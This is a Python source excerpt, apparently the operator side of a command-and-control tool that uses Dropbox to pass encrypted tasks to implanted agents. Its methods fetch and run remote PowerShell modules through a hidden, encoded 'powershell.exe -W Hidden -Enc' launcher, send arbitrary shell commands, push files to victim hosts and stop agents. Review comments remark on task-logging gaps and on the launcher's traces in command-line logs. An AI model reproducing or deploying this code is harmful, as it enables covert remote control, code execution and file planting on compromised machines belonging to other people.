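def taskAgentWithRunPSModule(self, moduleName, moduleArgs=None, interact=False):
    """Task the current agent with loading and running a published PowerShell module.

    The PowerShell source is produced by filling the 'runPSModuleTpl' template
    with two values: an XOR key derived from the master key
    (Crypto.convertKey(..., outputFormat="sha256")) and the module URL looked up
    in statusHandler.publishedModuleList.

    Args:
        moduleName: key into statusHandler.publishedModuleList. A name that is
            not present raises KeyError from the lookup.
        moduleArgs: optional text appended verbatim to the generated PowerShell
            after the module is loaded. No quoting or validation is applied here.
        interact: when true, the generated code is handed to taskAgentWithShell
            instead of being queued as a 'runPSModule' task.

    Returns:
        None. Also returns early, without tasking, when the template could not
        be rendered (convertFromTemplate returned None).
    """
    # Fill the template placeholders: key material plus the module location.
    xorKey = Crypto.convertKey(self.statusHandler.masterKey, outputFormat="sha256")
    templateValues = {
        'xorKey': xorKey,
        'moduleURL': self.statusHandler.publishedModuleList[moduleName],
    }
    poshCmd = helpers.convertFromTemplate(
        templateValues, cfg.defaultPath['runPSModuleTpl'])
    # Identity test for None (was '== None').
    if poshCmd is None:
        return

    # Optional arguments are concatenated as-is after a marker line.
    if moduleArgs:
        poshCmd += ";Write-Host \"-> Executing module arguments\";{}".format(
            moduleArgs)

    if interact:
        # NOTE(review): this path goes through taskAgentWithShell, which neither
        # creates nor commits a task, so interactive module runs are not
        # recorded in statusHandler's task list.
        self.taskAgentWithShell(poshCmd)
        return

    # The task record keeps the module name and its arguments.
    task = self.statusHandler.createTask(
        self.agentID, "runPSModule", args=[moduleName, moduleArgs])

    # Encode the script for -Enc and build the launcher command line.
    # NOTE(review): apart from the encoded payload this launcher string is
    # constant, so it shows up unchanged in process-creation / command-line
    # logging on the agent host.
    base64Payload = helpers.powershellEncode(poshCmd)
    launcher = "powershell.exe -NoP -sta -NonI -W Hidden -Enc {}".format(
        base64Payload)

    # Record layout: verb, task id, command, random string; one field per line.
    record = "runCLI\n{}\n{}\n{}".format(
        task['id'], launcher, helpers.randomString(16))

    # The record is encrypted with the master key before upload.
    commandFile = self.statusHandler.getAgentAttribute(self.agentID, 'commandFile')
    encryptedRecord = Crypto.encryptData(record, self.statusHandler.masterKey)
    uploadResult = self.dropboxHandler.putFile(commandFile, encryptedRecord)

    if uploadResult is None:
        print(helpers.color(
            "[!] Error tasking agent with ID [{}]".format(self.agentID)))
        return

    # Only a successful upload commits the task for this agent.
    self.statusHandler.commitTask(task)
    print(helpers.color(
        "[+] Agent with ID [{}] has been tasked with task ID [{}]".format(
            self.agentID, task['id'])))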
def taskAgentWithShell(self, cmd):
    """Write a 'shell' record carrying *cmd* to the current agent's command file.

    The record has four newline-separated fields: the verb 'shell', the literal
    'n/a' in the task-id position, the command text, and a
    helpers.randomString(16) value (presumably padding or a nonce; confirm
    against the agent side).

    No task is created or committed here, so shell commands are not tracked in
    statusHandler's task list; the only trace on the controller side is the
    console message printed below.

    Args:
        cmd: command text, embedded verbatim in the record.
    """
    record = "shell\n{}\n{}\n{}".format("n/a", cmd, helpers.randomString(16))

    # Encrypt with the master key, then upload to the agent's command file.
    commandFile = self.statusHandler.getAgentAttribute(self.agentID, 'commandFile')
    encryptedRecord = Crypto.encryptData(record, self.statusHandler.masterKey)
    uploadResult = self.dropboxHandler.putFile(commandFile, encryptedRecord)

    # putFile signals failure by returning None.
    if uploadResult is None:
        print(helpers.color(
            "[!] Error tasking agent with ID [{}]".format(self.agentID)))
        return

    print(helpers.color(
        "[+] Agent with ID [{}] has been tasked with shell command".format(
            self.agentID)))
def taskAgentWithSendFile(self, localFile, destinationPath):
    """Stage a local file on the Dropbox side, then task the agent to fetch it.

    Two uploads happen, in this order:
      1. the content of *localFile* goes to '/<agentID>.rsc';
      2. an encrypted 'downloadFile' record goes to the agent's command file.

    NOTE(review): the staged file content is passed to putFile exactly as read.
    Unlike the command record, it does not go through Crypto.encryptData. The
    staging path depends only on the agent ID, so successive calls for one
    agent target the same remote path.

    Args:
        localFile: path of the file to read on the controller host.
        destinationPath: path placed in the record as the destination on the
            agent side.

    Returns:
        None. Stops before tasking when the file cannot be opened or read, or
        when the staging upload returns None.
    """
    # The base name travels in the record; the remote staging name is per agent.
    fileName = os.path.basename(localFile)
    remoteFilePath = "/" + self.agentID + ".rsc"

    # Step 1: stage the file. IOError raised anywhere in this block is reported
    # as an open/read failure.
    try:
        with open(localFile) as fileHandle:
            print(helpers.color("[*] Uploading file [{}] to [{}]".format(
                localFile, remoteFilePath)))
            stagingResult = self.dropboxHandler.putFile(
                remoteFilePath, fileHandle.read())
        # The with-block has already closed the handle at this point.
        if stagingResult is None:
            return
    except IOError:
        print(helpers.color(
            "[!] Could not open or read file [{}]".format(localFile)))
        return

    # Step 2: create the task; its record keeps both paths.
    task = self.statusHandler.createTask(
        self.agentID, "sendFile", args=[localFile, destinationPath])

    # Record layout: verb, task id, staged path, destination, file name,
    # random string; one field per line.
    record = "downloadFile\n{}\n{}\n{}\n{}\n{}".format(
        task['id'], remoteFilePath, destinationPath, fileName,
        helpers.randomString(16))

    commandFile = self.statusHandler.getAgentAttribute(self.agentID, 'commandFile')
    encryptedRecord = Crypto.encryptData(record, self.statusHandler.masterKey)
    uploadResult = self.dropboxHandler.putFile(commandFile, encryptedRecord)

    if uploadResult is None:
        print(helpers.color(
            "[!] Error tasking agent with ID [{}]".format(self.agentID)))
        return

    # Only a successful upload commits the task for this agent.
    self.statusHandler.commitTask(task)
    print(helpers.color(
        "[+] Agent with ID [{}] has been tasked with task ID [{}]".format(
            self.agentID, task['id'])))
def taskAgentWithStop(self):
    """Queue a 'stop' task for the current agent.

    The record has three newline-separated fields: the verb 'stop', the task
    id, and a helpers.randomString(16) value. It is encrypted with the master
    key and uploaded to the agent's command file. The task is committed only
    when the upload succeeds.
    """
    task = self.statusHandler.createTask(self.agentID, "stop")

    record = "stop\n{}\n{}".format(task['id'], helpers.randomString(16))

    commandFile = self.statusHandler.getAgentAttribute(self.agentID, 'commandFile')
    encryptedRecord = Crypto.encryptData(record, self.statusHandler.masterKey)
    uploadResult = self.dropboxHandler.putFile(commandFile, encryptedRecord)

    # putFile signals failure by returning None; nothing is committed then.
    if uploadResult is None:
        print(helpers.color(
            "[!] Error tasking agent with ID [{}]".format(self.agentID)))
        return

    self.statusHandler.commitTask(task)
    print(helpers.color(
        "[+] Agent with ID [{}] has been tasked with task ID [{}]".format(
            self.agentID, task['id'])))